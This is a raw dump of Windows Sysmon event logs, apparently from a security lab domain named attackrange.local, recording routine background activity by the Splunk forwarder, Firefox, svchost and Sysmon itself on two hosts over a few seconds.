23542300x8000000000000000106783Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:24.395{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35A69596E1C0E40FAB451EE23CC21B20,SHA256=A87228A3BF784E1F549E527597ABE2F23687C670F1E267EC860D7A406DF9B99F,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000106782Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:00:24.248{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f5-0xe2cfd690) 354300x8000000000000000106781Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:22.439{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51859-false10.0.1.12-8000- 23542300x800000000000000083135Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:25.213{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E0E05DCFEEB6103BD5A230A295AA59C,SHA256=41BC996DCD7BA7EC60451F933F46AE713EE690021CA02C89875E0B3CF086A9B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106784Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:25.398{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80939B389854E516455B46669399E9C6,SHA256=D6A71C1D4A5D4AB97C18D0F5C59AF9CEA3173564789F45B2E3F5E578965DCAA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106786Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:26.416{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BFC0B58610C2FDBD5C53A9954872313,SHA256=31CFDF3B58B8C3651ED37068AEFC25FD35E78D0C52111293E544E77036DE59BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083136Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:26.322{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A7193BF07BA5ED9CD5A59ECFBBA191B,SHA256=545657F8E4F0BE7ADAC50B48252F2E12785D8A53C78C5CAAE996681F58C52C79,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106785Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:24.474{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-639.attackrange.local123ntpfalse20.101.57.9-123ntp 23542300x8000000000000000106793Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:27.436{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D4A2A00318FFD3AA7FB5B3E1D8C397D,SHA256=BF62A2AE11B37B5835C2E77C919B2C4D6A4311A4B84B33558DA2A9C9E44AAE24,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083138Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:24.705{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50144-false10.0.1.12-8000- 23542300x800000000000000083137Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:27.369{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D76C485257273C29876AC4EB4CDA00F,SHA256=9DAC440064CF13A1D0C25512EF50B484BA5AEF0657E81FA3AC03656E35B1C877,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106792Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:27.150{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=F3949C0808C805C9EFA3B24125184D30,SHA256=5D1B77E0F84620B81921FF72BC545A26DCC21075191DC81395B854EC964F3292,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106791Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:27.150{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=152E6B93A219D40618B68EF41BA3A790,SHA256=65C7BEEABDE0A3EC4630F3AFA995DC6C2269CC329DD9E72A89F05C2AC964CF1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106790Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:27.150{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=E56E3DB258EAA7821E4925A869D8A44E,SHA256=15D66EEFC10196CA084E5D031730D1904F34B0B194A33E049B03EB52BD7B9310,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106789Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:27.150{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=0F5938E025E0E16669AB621785C021EF,SHA256=B5F6D72543BA01C8221FEBB66E9F7542144B5B8F350C39D3F40FAE6BDF3BD4AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106788Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:27.150{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=9AC6065BF3A09F1FFB8AF3D3D25C2BEF,SHA256=D11CF86A5872EC8C3AB22CBC8E75A55ECB250D98FBFA931139EB7A26F3702276,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106787Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:27.150{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=D1AD96E5516480D4D804FB93CB8EC6CD,SHA256=78285613994AAD39CA7BD42A5D809942B976EAC1294C353A7A124FECFBDF2954,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106794Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:28.452{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1F405F867E725ACF4201535CC4B0338,SHA256=7FA14AF7D5E04AFB2CD6CAA1CF33BAEF5A28F6D8BE8256C6231BF4A899525953,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083139Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:28.369{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27B1D1D9CFC01F363BC49F2249BC6654,SHA256=9B09CA6C39BCECD42EEDF26E516D6871559E8AAF4D0757099E34986CED8D4494,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083141Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:29.838{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083140Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:29.494{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81B113FBC2C9A3C0A91A73AEEC903297,SHA256=5582093D3CF3258D19B44D354A52E55DC085FCEA0A0647296BC624DA4C277966,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106795Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:29.467{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33C2456A842200188C56289FCC4646F,SHA256=F1547FAD1D25C22FAF1352AE4D4BD84071B0363C89C8A0603AED5052F72794C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083142Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:30.603{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DC0A710BC41D1EB688CE994F03AFF37,SHA256=B14D612BE9CD36E65982EB72D0C81146A2DB04747944B094DFC8C71C612BFF4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106797Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:30.481{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=892A84999B0554A4E522182569CE6E3A,SHA256=E063449CBA945C571AD13777376E9BCBA1C85F3127BECA29A5682F4AFC37F063,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106796Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:28.455{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51860-false10.0.1.12-8000- 23542300x8000000000000000106798Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:31.515{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2148729E7C17C45EC64A960D9431E38,SHA256=B2B6AFC7767E9B103F2243FEA0254B3335D3D5426F4FF0B0AD2C1D3D07356A73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083156Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.619{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F06D70FA94FE1C904BCE444012AF99E,SHA256=68D2284A91F8C6519D81909C0A1486F5E314376F37A78A5001FFE383C669333B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083155Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B49F-615A-8801-00000000FD01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083154Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083153Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083152Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083151Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083150Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083149Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083148Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083147Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083146Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083145Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B49F-615A-8801-00000000FD01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083144Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.400{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B49F-615A-8801-00000000FD01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083143Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:31.401{2FDD8D40-B49F-615A-8801-00000000FD01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000106805Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 